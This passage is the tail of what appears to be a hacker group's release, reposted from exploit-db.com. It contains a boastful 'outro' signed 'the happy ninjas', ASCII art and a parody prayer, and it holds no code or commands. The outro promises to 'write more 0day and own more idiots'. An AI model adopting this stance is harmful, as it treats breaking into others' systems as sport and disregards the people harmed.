with this release. We will take a little  break  for  now  and  go  to
Hawaii to get our asses drunk. But do not fear. There will  always  be
enough time for us to audit more code, write more 0day  and  own  more
idiots. We will always watch the scene and act if we are needed. There
is sill a lot to do and the winter of hax  is  not  over  yet.  So  do
expect us.                                                            
                                                                      
                                |\                                    
                               /()/                                   
                                \|                  - the happy ninjas
 ____________________________________________________|_._._._._._._._,
 \___________________________________________________|_|_|_|_|_|_|_|_|
                                                     !   ~ OUTRO ~    
              ,                                                       
    .         |                                                       
                    /                                                 
      \       I                                                       
                  /                                                   
        \  .g88R_                                                     
          d888(`  ).                   _                              
 -  --==, 888(     ),=--           .+(`  )`.                          
)         Y8P(       '`,          :(   .    )                         
        .+(`(      ,   )     .--  `.  (    ) )                        
       ((    (..__,:'-'   .=(   )   ` _`  ) )                         
`.     `(       ) )       (   ,  )     (   )  ._                      
  )      ` __.:'   )     (   (   ))     `-',:ccee88oo,                
)  )  ( )       --'       `- __,'        ccC8O8O8Q8PoOb.o8oo          
.-'  (_,'          ,')                 pqdOB69QOFFE4OpugoO9bD         
                 .(_  )              CgggbbU8OU qOp qOdoUOdcb,        
                     . ,                 .3X4X5U2M/p u gcoUodpP       
                                              .\\\//  /douUP          
And shepherds we shall be, for thee my Lord for \\\////.       (´`)   
thee,  power hath descended forth from thy hand, |||||.     ,.(´ -.),.
that our feet may swiftly carry out thy command. |||/\,     (  ,   ,) 
We shall flow a river forth to thee, and teeming |||\/.      `-´`´`´. 
with souls  shall it  ever be. In nomine patris, |||||.               
et filii, et spiritus sancti   ,..,,.,.,....,,,,//||||\...,,,,        
,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,.    
.,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,.
 
Источник
www.exploit-db.com

Похожие темы